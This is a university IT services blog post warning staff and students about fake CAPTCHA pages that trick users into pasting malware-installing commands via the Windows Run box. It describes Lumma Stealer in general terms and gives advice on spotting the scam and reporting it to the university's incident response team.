Fake CAPTCHA scams target universities

Liam Watt
Tuesday 17 June 2025

A new scam is making the rounds and it imitates a widely recognised online verification measure. Cybercriminals are now exploiting trust in the “I’m not a robot” CAPTCHA process to trick users into downloading malware. Instead of confirming you’re human, these fake CAPTCHAs require the user to complete a series of steps that trigger background downloads of malicious software.

As it’s estimated that over 200 million CAPTCHAs are completed daily, they are a prime target for abuse. We have concerns that this attack has already affected other universities.

What is CAPTCHA?

CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. They present website users with a challenge to ensure they are human. The test is relatively simple for humans but difficult for automated systems or bots. Malicious bots can be used by cybercriminals to automate phishing and Distributed Denial of Service attacks, as described in our previous guidance about mail bombing attacks. So, CAPTCHAs provide an easy way for companies to safeguard their online services.

How the scam works

Fake CAPTCHAs often appear on untrusted or compromised websites and prompt users to follow steps that lead to malware installation, not verification. To achieve this, the fake CAPTCHA will ask the user to hold Windows key and R to open the Run window.

When the user presses “I’m not a robot”, instead of verifying they are human, the malicious system will copy a command that installs malware onto their computer. One of the most popular malwares delivered this way is called Lumma Stealer. Once Lumma Stealer is installed, the program can steal browser-stored credentials, cookies, crypto wallets, and system information -  all without the user knowing they have given a cybercriminal access to their device.

As stated in HP’s recent press release, the rise in fake CAPTCHAs has resulted in an increase of:

  • malware – stealing your information of login credentials
  • spyware – recording your activity
  • ransomware – locks you out of your account and demands payment

How to spot a fake one

Common characteristics of malicious CAPTCHAs include requests to:

  • use shortcuts to run commands (Windows key and R) or copy and paste (Ctrl + C, Ctrl + V).
  • enter credentials
  • download files

What should I do if I suspect one is fake

If you believe that you have fallen victim to this scam:

  • Exit the website immediately: Close the browser tab or window where the suspicious site is open.
  • Run a malware scan on WithSecure. This is pre-installed on University-supplied laptops and available for students and staff to download from Apps Anywhere on personal devices.
  • Reach out to St Andrews CSIRT (Computer Security Incident Response Team) by emailing [email protected] so they can monitor and address the issue.

Subscribe to the IT Services blog

Enter your email address to subscribe to this blog to receive notifications of new posts.

Cookie preferences